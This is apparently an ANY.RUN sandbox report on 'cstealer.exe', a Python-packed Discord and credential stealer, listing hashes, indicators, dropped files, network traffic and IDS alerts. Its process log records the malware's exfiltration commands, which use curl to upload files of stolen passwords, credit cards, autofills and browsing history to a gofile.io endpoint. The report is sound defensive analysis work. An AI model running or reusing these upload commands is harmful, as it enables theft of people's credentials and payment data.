File name:

cstealer.exe

Full analysis: https://app.any.run/tasks/0d4571c8-29a2-45bb-8489-adc2efa9b258
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: August 12, 2024, 20:29:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stealer
evasion
python
pyinstaller
discordgrabber
generic
discord
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

6C6AFA5E3B826AE0C81606D355AAC12A

SHA1:

43DEB720DF1E09B6843A318C40C138A0CDED030D

SHA256:

462AB2AB989C55FA3C9209585EA6BB8743E04437A5DAC1BCEBDDA24B14E4B785

SSDEEP:

98304:NydDOokcaCJr/VzkvddwCXkFqdz3aC3bww/Al+Biyz6oqV2kiDIA5TAzqo9pDZf9:BVotYLXOx6mDiX/TZZQWbq+4uiP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • cstealer.exe (PID: 6516)

    • Actions looks like stealing of personal data

      • cstealer.exe (PID: 6516)

    • DISCORDGRABBER has been detected (YARA)

      • cstealer.exe (PID: 6516)

  • SUSPICIOUS

    • Drops the executable file immediately after the start

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)

    • Process drops legitimate windows executable

      • cstealer.exe (PID: 6496)

    • Application launched itself

      • cstealer.exe (PID: 6496)

    • Executable content was dropped or overwritten

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)

    • Process drops python dynamic module

      • cstealer.exe (PID: 6496)

    • The process drops C-runtime libraries

      • cstealer.exe (PID: 6496)

    • Loads Python modules

      • cstealer.exe (PID: 6516)

    • Checks for external IP

      • cstealer.exe (PID: 6516)
      • svchost.exe (PID: 2256)

    • Starts CMD.EXE for commands execution

      • cstealer.exe (PID: 6516)

    • Data upload via CURL

      • curl.exe (PID: 6196)
      • curl.exe (PID: 6172)
      • curl.exe (PID: 6736)
      • curl.exe (PID: 4672)
      • curl.exe (PID: 6856)
      • curl.exe (PID: 2872)

  • INFO

    • Checks supported languages

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)
      • curl.exe (PID: 6172)
      • curl.exe (PID: 6196)
      • curl.exe (PID: 6736)
      • curl.exe (PID: 6856)
      • curl.exe (PID: 4672)
      • curl.exe (PID: 2872)

    • Reads the computer name

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)
      • curl.exe (PID: 6196)
      • curl.exe (PID: 6172)
      • curl.exe (PID: 6736)

    • Create files in a temporary directory

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)

    • Reads the machine GUID from the registry

      • cstealer.exe (PID: 6516)

    • Checks proxy server information

      • cstealer.exe (PID: 6516)

    • Creates files or folders in the user directory

      • cstealer.exe (PID: 6516)

    • PyInstaller has been detected (YARA)

      • cstealer.exe (PID: 6496)
      • cstealer.exe (PID: 6516)

    • Attempting to use instant messaging service

      • cstealer.exe (PID: 6516)
      • svchost.exe (PID: 2256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:08:12 19:53:46+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.4
CodeSize: 167936
InitializedDataSize: 152576
UninitializedDataSize: -
EntryPoint: 0xbe20
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
147
Monitored processes
21
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start THREAT cstealer.exe #DISCORDGRABBER cstealer.exe svchost.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1172C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cscreditcards.txt" https://store8.gofile.io/uploadFile"C:\Windows\System32\cmd.execstealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2256C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2536\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2608\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2872curl -F "file=@C:\Users\admin\AppData\Local\Temp\cshistories.txt" https://store8.gofile.io/uploadFileC:\Windows\System32\curl.execmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
26
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
3008\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3068\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4316C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile"C:\Windows\System32\cmd.execstealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4672curl -F "file=@C:\Users\admin\AppData\Local\Temp\csautofills.txt" https://store8.gofile.io/uploadFileC:\Windows\System32\curl.execmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
26
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
Total events
17 232
Read events
17 232
Write events
0
Delete events
0

Modification events

No data
Executable files
111
Suspicious files
10
Text files
22
Unknown types
0

Dropped files

PID
Process
Filename
Type
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_chacha20.pydexecutable
MD5:CB5238E2D4149636377F9A1E2AF6DC57
SHA256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_Salsa20.pydexecutable
MD5:371776A7E26BAEB3F75C93A8364C9AE0
SHA256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_blowfish.pydexecutable
MD5:45616B10ABE82D5BB18B9C3AB446E113
SHA256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_aes.pydexecutable
MD5:F751792DF10CDEED391D361E82DAF596
SHA256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_ARC4.pydexecutable
MD5:6176101B7C377A32C01AE3EDB7FD4DE6
SHA256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Hash\_BLAKE2b.pydexecutable
MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
SHA256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_ocb.pydexecutable
MD5:D48BFFA1AF800F6969CFB356D3F75AA6
SHA256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_ctr.pydexecutable
MD5:C6B20332B4814799E643BADFFD8DF2CD
SHA256:61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_des3.pydexecutable
MD5:6C3E976AB9F47825A5BD9F73E8DBA74E
SHA256:238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
6496cstealer.exeC:\Users\admin\AppData\Local\Temp\_MEI64962\Crypto\Cipher\_raw_ecb.pydexecutable
MD5:FEE13D4FB947835DBB62ACA7EAFF44EF
SHA256:3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
55
DNS requests
22
Threats
25

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2728
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6836
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6776
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1292
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
192.168.100.255:138
whitelisted
6080
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6516
cstealer.exe
104.26.2.16:443
rentry.co
CLOUDFLARENET
US
unknown
6516
cstealer.exe
172.67.74.152:443
api.ipify.org
CLOUDFLARENET
US
unknown
6516
cstealer.exe
45.112.123.126:443
api.gofile.io
AMAZON-02
SG
unknown
6516
cstealer.exe
159.89.102.253:443
geolocation-db.com
DIGITALOCEAN-ASN
DE
unknown
1292
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 20.73.194.208
whitelisted
google.com
  • 142.250.181.238
whitelisted
rentry.co
  • 104.26.2.16
  • 172.67.75.40
  • 104.26.3.16
unknown
api.ipify.org
  • 172.67.74.152
  • 104.26.12.205
  • 104.26.13.205
shared
api.gofile.io
  • 45.112.123.126
  • 51.38.43.18
whitelisted
geolocation-db.com
  • 159.89.102.253
whitelisted
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.138
  • 40.126.32.136
  • 40.126.32.133
  • 40.126.32.72
  • 20.190.160.20
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Misc activity
ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
6516
cstealer.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6516
cstealer.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6516
cstealer.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6516
cstealer.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
2256
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
6516
cstealer.exe
Misc activity
ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
2256
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
6516
cstealer.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2256
svchost.exe
Misc activity
ET INFO External IP Lookup Domain in DNS Lookup (geolocation-db .com)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
cstealer.exe